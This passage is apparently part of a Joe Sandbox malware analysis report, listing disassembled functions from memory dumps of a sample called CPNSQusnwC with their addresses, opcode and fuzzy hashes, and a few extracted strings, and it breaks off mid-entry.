                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: df039bb6a92599eb316da8e7f7dd5427e086c38e195267801e315566543923d6
                                                        • Instruction ID: ab351d1f08623104808dfba6fac55440170e9444e543c2ded520723afbdad9d3
                                                        • Opcode Fuzzy Hash: df039bb6a92599eb316da8e7f7dd5427e086c38e195267801e315566543923d6
                                                        • Instruction Fuzzy Hash: 96F0F43130CA088FD798DF2CA8566B833E2FF99224B10027FD58ED36A5CE2598028381
                                                        Function 00007FFD345A3AAC Relevance: .0, Instructions: 48COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3c9fc6603dd84c68b76fc47c52429a5aaa37e7029419f5e5741af0856113f562
                                                        • Instruction ID: 4f764b129524a9782b3fe648f5ff05c4a90d458cd9f6596db4a87d32df60c94c
                                                        • Opcode Fuzzy Hash: 3c9fc6603dd84c68b76fc47c52429a5aaa37e7029419f5e5741af0856113f562
                                                        • Instruction Fuzzy Hash: 26015E30B15A0C8FD799DF28C8A9A69B7E2FF59304B0042AED44ED76A1CF34AC408B00
                                                        Function 00007FFD34966B02 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10d082ee016544396b9d4ad6134c118667a551885edfd12faeaa4e034a46d038
                                                        • Instruction ID: 0e029b0c69215d0414418eb01701321740c6e3de961d0ebc21039009a47d41ec
                                                        • Opcode Fuzzy Hash: 10d082ee016544396b9d4ad6134c118667a551885edfd12faeaa4e034a46d038
                                                        • Instruction Fuzzy Hash: A8F0C23284E2C5AFD3129BB088A14E57FE8AF43320B1800EAD145C70A6C62D1A0AE761
                                                        Function 00007FFD345A1DC1 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6ad5c44bb53c13b2c9cb8406d77af7effef6df79bf8051c822559e972c2ca358
                                                        • Instruction ID: 766c16ee103d56baeafb4339bce88da057d694783481e3844e07ae02abcb19cd
                                                        • Opcode Fuzzy Hash: 6ad5c44bb53c13b2c9cb8406d77af7effef6df79bf8051c822559e972c2ca358
                                                        • Instruction Fuzzy Hash: 54F0E23194D24C8FEB66EF2484A12E93FA1FF56310F4401AAE508C3082CB7DD955C781
                                                        Function 00007FFD345ABE72 Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7892f9876437c5ef4a6edd0671cf6a17b96a168ef8bbaf23f5c7e9691b6959da
                                                        • Instruction ID: bb33fb55c8d4ce67e8a36ea38d57c59a7816ef068fe3061d857f8884d1bea6fb
                                                        • Opcode Fuzzy Hash: 7892f9876437c5ef4a6edd0671cf6a17b96a168ef8bbaf23f5c7e9691b6959da
                                                        • Instruction Fuzzy Hash: 49F0B43185E3C59FD703CBB088655E63FB4EF43204B1901E7E285CB0E2CA6D1A1AD762
                                                        Function 00007FFD349612E2 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da6cc38187d8ab109da3f1174bcfd8fc8a2e75ffd0736ef1a088054dea4e8a17
                                                        • Instruction ID: 0ee243cd04bdd159620044abc6cab44fc73fa701617831f896973a6ff73fc395
                                                        • Opcode Fuzzy Hash: da6cc38187d8ab109da3f1174bcfd8fc8a2e75ffd0736ef1a088054dea4e8a17
                                                        • Instruction Fuzzy Hash: 43F0963184E3C59FD302DB7088664D97FB4AF43364F1900FAD5C6CB4A2D92D1616E761
                                                        Function 00007FFD345A77D9 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26ec478608e7a975f6da0cc2b6e9be2623ba4ed44c3602587c08b39fe011c43b
                                                        • Instruction ID: 2ae844f0f4d021c435a903b385c2dbe50a2ce404429b77f5327f244fbe993ae6
                                                        • Opcode Fuzzy Hash: 26ec478608e7a975f6da0cc2b6e9be2623ba4ed44c3602587c08b39fe011c43b
                                                        • Instruction Fuzzy Hash: D2E06D4088F3D20FD74723790DA65E13FA88D43161B0E00E3E884CA8D3D80D429B9332
                                                        Function 00007FFD345AD658 Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7fa26df94e75b43d5585e7242ab8d9907986b282793c74211baf123a48f7df0
                                                        • Instruction ID: 5dd6bd42b55b4e8c23fd5ff874b4908d9b044174d7ded61870d032f5e0133561
                                                        • Opcode Fuzzy Hash: b7fa26df94e75b43d5585e7242ab8d9907986b282793c74211baf123a48f7df0
                                                        • Instruction Fuzzy Hash: A1F08240F5FA4B8EE7EB6A2499B52F92A42AF43300F74067AC70EC71D5C91D7509B392
                                                        Function 00007FFD345ACB6A Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 812ec8b0d355182bf68327aae9bec46f70a9522b448bfd2085ba0921334ef112
                                                        • Instruction ID: 4da2d98eb04efea4ce78fa4829f473b704fe8de35c6552ab1df9de7a1db1bd12
                                                        • Opcode Fuzzy Hash: 812ec8b0d355182bf68327aae9bec46f70a9522b448bfd2085ba0921334ef112
                                                        • Instruction Fuzzy Hash: 65F06221E0E2C64FEB539B684CE15943F90AF1731070805BAC485CB1D7D65C6405A751
                                                        Function 00007FFD345A413E Relevance: .0, Instructions: 29COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 64a3bb366a24f33608ef4671077fe7d118928422cbcc705c1e7aa4608a4b5338
                                                        • Instruction ID: f7aa3227e27ec59ba5d5aba25a65fed85176156c3b0f915327d2ce38318e0098
                                                        • Opcode Fuzzy Hash: 64a3bb366a24f33608ef4671077fe7d118928422cbcc705c1e7aa4608a4b5338
                                                        • Instruction Fuzzy Hash: 19F0A071F09AC44FDB49EBA884A52683BE0EF5A314B15007ED05EC62CBDE2898828340
                                                        Function 00007FFD345A32E9 Relevance: .0, Instructions: 24COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d304041562c9242e4f64be2851857fa1d8bdef4f1f48974df3600b2825c6b1e4
                                                        • Instruction ID: 2afb855a19766af3b0f4143c12dc55f652d61559f870fa26af425a78958c85ca
                                                        • Opcode Fuzzy Hash: d304041562c9242e4f64be2851857fa1d8bdef4f1f48974df3600b2825c6b1e4
                                                        • Instruction Fuzzy Hash: 26E0D831D1F28D9BEB53DB5084A10ED7BA0EF12208F1400F7D949C34C1CD6C2518A652
                                                        Function 00007FFD34961FD7 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bc1ad4dbec8942fe14579e94f83fe48a94f66382d24d8c19518dd150c8943168
                                                        • Instruction ID: ba5de52683b756c113e4c63d610533778b623dc0028bbe5ab24bf9a45667a1c0
                                                        • Opcode Fuzzy Hash: bc1ad4dbec8942fe14579e94f83fe48a94f66382d24d8c19518dd150c8943168
                                                        • Instruction Fuzzy Hash: 3ED0C242F0C3C54BFB2603B408B11782A919F0739074501BEC29ACE1D7C80C3804B321
                                                        Function 00007FFD349682DB Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fdecc4c68ed00517b5ebd52ecfd5f2e7112cd68613a00b4b785dfb79f31a0ac2
                                                        • Instruction ID: 5d17be922954768242e6f1edb45d72a4f1691edca858159a05c8f54813ab093c
                                                        • Opcode Fuzzy Hash: fdecc4c68ed00517b5ebd52ecfd5f2e7112cd68613a00b4b785dfb79f31a0ac2
                                                        • Instruction Fuzzy Hash: E1D0C910B4EA0385F578C60141F063951915F43771F6000BEC29FC18CDCD2C7901B22A
                                                        Function 00007FFD34962ABB Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d16d23a9b51ed83da3b32615f85c352df8228a0dad49eaab84f5b8e4236733e
                                                        • Instruction ID: ffc0f088cd79b233b19921b65024844c6c7a38d7e8147f0b6675e1de8a2d324d
                                                        • Opcode Fuzzy Hash: 9d16d23a9b51ed83da3b32615f85c352df8228a0dad49eaab84f5b8e4236733e
                                                        • Instruction Fuzzy Hash: DFD0C914B0CA0385F139670180F023E51949F03330E64087EC29FDE8C9CD5C7481B722
                                                        Function 00007FFD345A4ACB Relevance: .0, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2d609a392423b6af01024242b8bb6762e198c782e5ae2788d2b8367bac20bff5
                                                        • Instruction ID: c9652b84374a53334ea325428c63db08d7a9a65cd77a9c84a778d903a8382490
                                                        • Opcode Fuzzy Hash: 2d609a392423b6af01024242b8bb6762e198c782e5ae2788d2b8367bac20bff5
                                                        • Instruction Fuzzy Hash: 79D0C918F0F52786F1FB468140F123A6196AF03702E60813EC36FC19C5CD1C74017205
                                                        Function 00007FFD345A3FDF Relevance: .0, Instructions: 8COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc13d65bb3f94a839aac958c00744269dad773ae26f81bb1fb945fe0ac7522dd
                                                        • Instruction ID: 582367355cd674ebc65da30afdd5049c24fee95d18bc187f3609c985113ef83d
                                                        • Opcode Fuzzy Hash: fc13d65bb3f94a839aac958c00744269dad773ae26f81bb1fb945fe0ac7522dd
                                                        • Instruction Fuzzy Hash: 8BC04C41F0E2D266E66351A408E507C06502B272457660572D616C51C3D84C69067211
                                                        Function 00007FFD34967811 Relevance: .0, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2254872705.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd34960000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be5f9ec9abc498be2ea9a7b24a1a07f334d7df2407ff61f74c18e8510fa84fbe
                                                        • Instruction ID: b304ffdbe589bb6e03e0d2a4900667b3accfb49764bb81b197ac0fa015be9d89
                                                        • Opcode Fuzzy Hash: be5f9ec9abc498be2ea9a7b24a1a07f334d7df2407ff61f74c18e8510fa84fbe
                                                        • Instruction Fuzzy Hash: 8CB00254F1C20396B56410A418F547D11410B46675AA41979D72FD61CADC9D2940B5B1

                                                        Non-executed Functions

                                                        Function 00007FFD345AA120 Relevance: 16.5, Strings: 13, Instructions: 248COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$ h4$0h4$0h4$@$Ph4$Ph4$`h4$`h4$ph4$ph4$h4$h4
                                                        • API String ID: 0-4103701557
                                                        • Opcode ID: 286b59099191a48c8b92cfcf86f2e8ed1b64d156a7ad784eae1bb7ecec308938
                                                        • Instruction ID: ae67e1d2ab637bcd6670a50581fcd3c3bda9fc466853b55906fc8d02a514f1c4
                                                        • Opcode Fuzzy Hash: 286b59099191a48c8b92cfcf86f2e8ed1b64d156a7ad784eae1bb7ecec308938
                                                        • Instruction Fuzzy Hash: AD91B992E4F6C15FF3D78A2458A917D7FA1FF53244B0800BBD294C60D7E91EAD2A9342
                                                        Function 00007FFD345AA0A0 Relevance: 15.3, Strings: 12, Instructions: 293COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$0h4$@$Ph4$Ph4$`h4$`h4$ph4$ph4$h4$h4
                                                        • API String ID: 0-2014953745
                                                        • Opcode ID: df7c3caf1d003a305494a46e9d969160981b6c4ff55dad82fd8ed36230e92ab9
                                                        • Instruction ID: 15035453925de204ffa3c98c7cc6e88b947907a99ee8c29105c5fce2fd3773c1
                                                        • Opcode Fuzzy Hash: df7c3caf1d003a305494a46e9d969160981b6c4ff55dad82fd8ed36230e92ab9
                                                        • Instruction Fuzzy Hash: EBB1C992E4F6C15FF3D38A3458A91797F91FF53244B0800BBD294C70D7A91EAD2A9342
                                                        Function 00007FFD345AA0D0 Relevance: 15.3, Strings: 12, Instructions: 275COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$0h4$@$Ph4$Ph4$`h4$`h4$ph4$ph4$h4$h4
                                                        • API String ID: 0-2014953745
                                                        • Opcode ID: 88dded7c0e59d53da895e4992798c7b696817c06490e2d836f07280da155e76b
                                                        • Instruction ID: b50488c393c6d175ac5f2cb6cef0c08188f381060be9ff9aaf6fc589a1c69d9c
                                                        • Opcode Fuzzy Hash: 88dded7c0e59d53da895e4992798c7b696817c06490e2d836f07280da155e76b
                                                        • Instruction Fuzzy Hash: FAB1A992E4F6C16FF3D78A3458A91797F91FF53244B0800BBD294C60D7A91EAD2A9342
                                                        Function 00007FFD345AA110 Relevance: 15.3, Strings: 12, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$0h4$@$Ph4$Ph4$`h4$`h4$ph4$ph4$h4$h4
                                                        • API String ID: 0-2014953745
                                                        • Opcode ID: 01f456f10fd51a1fe97ff0c9549e81dda6e4d816c4892d7b5b1bfc3f4845f27e
                                                        • Instruction ID: eb825d7c0ea0020609183683b15a8ae8f343580622eb6c1c92d6a476e4452a9a
                                                        • Opcode Fuzzy Hash: 01f456f10fd51a1fe97ff0c9549e81dda6e4d816c4892d7b5b1bfc3f4845f27e
                                                        • Instruction Fuzzy Hash: A3A1B892E4F6C15FF3978A2458A91797FA1FF53244B0800BBD294C60D7E91EAD2A9342
                                                        Function 00007FFD345AA170 Relevance: 11.5, Strings: 9, Instructions: 215COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$@$Ph4$`h4$ph4$ph4$h4$h4
                                                        • API String ID: 0-1467158570
                                                        • Opcode ID: e21106707510b907c65e81460c394823138d0ff3b7a7f4b2c85d09df73dc9d8b
                                                        • Instruction ID: 6dac9f86341a6a7fd991aa77635d7e9627b5551d26583bfc87e2df88e856d3ec
                                                        • Opcode Fuzzy Hash: e21106707510b907c65e81460c394823138d0ff3b7a7f4b2c85d09df73dc9d8b
                                                        • Instruction Fuzzy Hash: 2E81A852E4F6C15FF3D78A2448A917D7FA1FF53248B0800BBD294C60D3E91EAD2A9346
                                                        Function 00007FFD345AA190 Relevance: 10.2, Strings: 8, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$@$Ph4$`h4$ph4$h4$h4
                                                        • API String ID: 0-1758790212
                                                        • Opcode ID: 00eac1a528459457f3648920c52e5df909bfad534cf767292da98d7611a59bdb
                                                        • Instruction ID: 611f5508f0f6e038c643db20f39b16cc628eaa7fdecfb20e937788511db37b04
                                                        • Opcode Fuzzy Hash: 00eac1a528459457f3648920c52e5df909bfad534cf767292da98d7611a59bdb
                                                        • Instruction Fuzzy Hash: 9E71B852E4F6C15FF3D78A2448A917D7FA1FF53248B0800BBD294C60D3E91EAD269346
                                                        Function 00007FFD345AA1C0 Relevance: 10.2, Strings: 8, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$@$Ph4$`h4$ph4$h4$h4
                                                        • API String ID: 0-1758790212
                                                        • Opcode ID: 8012709538876b8b0e6dc8a0345d9a76d949f766efbc100c42ad7c430d452ec0
                                                        • Instruction ID: 369c86e5f8527642ae16ca00446e4f9b397aa3dad58988a43f79527b2e63bb33
                                                        • Opcode Fuzzy Hash: 8012709538876b8b0e6dc8a0345d9a76d949f766efbc100c42ad7c430d452ec0
                                                        • Instruction Fuzzy Hash: 5F61D792F4F6C15BF3978A2448E917D7FA1FF53248B1800BBD294C60D3E91EAD269742
                                                        Function 00007FFD345AA220 Relevance: 8.9, Strings: 7, Instructions: 171COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h4$0h4$@$Ph4$`h4$ph4$h4
                                                        • API String ID: 0-784512458
                                                        • Opcode ID: 450c568b6006b9be5f864cfd03017a11defeff1fefcd3d499ad7647c4401688b
                                                        • Instruction ID: 0162c5b3dc4c20ccb852dd6cf6ecf0381fe5f338326c8b538b1389625c6ea4f3
                                                        • Opcode Fuzzy Hash: 450c568b6006b9be5f864cfd03017a11defeff1fefcd3d499ad7647c4401688b
                                                        • Instruction Fuzzy Hash: 4661B752F4F6C15BE3D38A3448EA5AD7FA0FF53248B1800BBD294C60D3E91F69269746
                                                        Function 00007FFD345AA0B0 Relevance: 6.4, Strings: 5, Instructions: 133COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0h4$Ph4$`h4$ph4$h4
                                                        • API String ID: 0-203040883
                                                        • Opcode ID: 7954d2b56122aa7f9aca2f112039cf8117106f59ba2d69f63b9462623a15f3ab
                                                        • Instruction ID: 7f2d1167aec8308d4fda98007c5d20ef33163d1fa67d177e6120cb34420c9990
                                                        • Opcode Fuzzy Hash: 7954d2b56122aa7f9aca2f112039cf8117106f59ba2d69f63b9462623a15f3ab
                                                        • Instruction Fuzzy Hash: 8E41A492E0FAC16FF3A749345869139AFD1FF93280B0844BFD2C4C64D7A65DAD199342
                                                        Function 00007FFD345AA100 Relevance: 6.4, Strings: 5, Instructions: 113COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0h4$Ph4$`h4$ph4$h4
                                                        • API String ID: 0-203040883
                                                        • Opcode ID: d7eafcfe3f421f593592e2efcea65426a531126b6da5551280f8e5fa9910b472
                                                        • Instruction ID: 08595c4a494a1b71b0a3670ba7b9350280410322e8e00f70a687c45b5e5e616e
                                                        • Opcode Fuzzy Hash: d7eafcfe3f421f593592e2efcea65426a531126b6da5551280f8e5fa9910b472
                                                        • Instruction Fuzzy Hash: F341B292E0FAC16FF3A74D645869139AF91BF9328070840BBD2C4C60D7A55DAD199352
                                                        Function 00007FFD345AA250 Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Ph4$`h4$ph4$h4
                                                        • API String ID: 0-2339740579
                                                        • Opcode ID: ebb85a89b7785d85d8ddfd4ffc68c996a5485b4fb4e6dd8b58f81804ed0f22fe
                                                        • Instruction ID: 3ec24e4feefd9bc8b6ffb741936f9816fc39be4591154020010bf6d05160ca88
                                                        • Opcode Fuzzy Hash: ebb85a89b7785d85d8ddfd4ffc68c996a5485b4fb4e6dd8b58f81804ed0f22fe
                                                        • Instruction Fuzzy Hash: B1418B52E4F6C15BE3978A2448E95AD7BA0EF13248B1800BBD294C70D3E91F69279746
                                                        Function 00007FFD343DA610 Relevance: 3.9, Strings: 3, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2220019522.00007FFD343D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd343d0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: G4$8G4$pG4
                                                        • API String ID: 0-3149202048
                                                        • Opcode ID: f59864515e926072a0b2d20a70c53782fb0d57233a99a47add970878bc8faa4b
                                                        • Instruction ID: 69e3382109512a21b162b545a203ac15a6da361efe7b9c8c8a2c4de5ca83c1d4
                                                        • Opcode Fuzzy Hash: f59864515e926072a0b2d20a70c53782fb0d57233a99a47add970878bc8faa4b
                                                        • Instruction Fuzzy Hash: AC41B143A4F2C14FF751AABC4D6A2A96FE1FF5322471810FBC5C4C709B991E9D4AA342
                                                        Function 00007FFD345A13E0 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2223205846.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ffd345a0000_CPNSQusnwC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: /2_^$02_^
                                                        • API String ID: 0-3452272886
                                                        • Opcode ID: dac59fdbec4432a23a941eb861a43dc0c93ad647a6a9c872a21398730b597e33
